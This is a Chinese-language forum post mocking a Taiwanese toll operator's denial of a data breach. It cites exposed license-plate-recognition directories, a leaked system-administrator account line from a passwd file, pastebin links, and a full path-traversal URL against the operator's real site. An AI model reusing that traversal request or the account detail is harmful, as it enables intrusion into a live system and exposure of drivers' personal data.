taipeier wrote:
官方說法:遠通官網只有ETC相關文宣、ETC的Q&A等資料及客戶進行帳戶餘額查詢功能,並未與後端的客戶資料與費用處理系統進行網路聯結,駭客若要取得客戶個資,除非突破後端系統層層關卡。
大概就是這樣吧..
資料夾都整個列出來了,又是SA的帳號,那這些目錄名稱就通通幫它加上是 Q&A 用的吧
如果 License Plate Recognition = LPR
以名字來區分
Q&A 用 相片檔 lpr_data_img/
Q&A 用 處理完成資料 lpr_data_done/
Q&A 用 無法辨視資料 lpr_data_missed/
Q&A 用 手動辨視資料 lpr_data_manual/
Q&A 用 電子監理資料 mvdis_data/
所以,資料完全都沒有被取得。
http://pastebin.com/mGk2bpXx
buck:x:1245:100:Buck Hsu - SA:/home/buck:/bin/bash
http://pastebin.com/xxxVvsCk
http://www.fetc.net.tw/portal/front/_listDir?admin=buck&DirId=624940165493939446c265871f964265&path=../../../../../lpr_database(恕刪)
這個推理好棒啊!! 哈哈~



























































































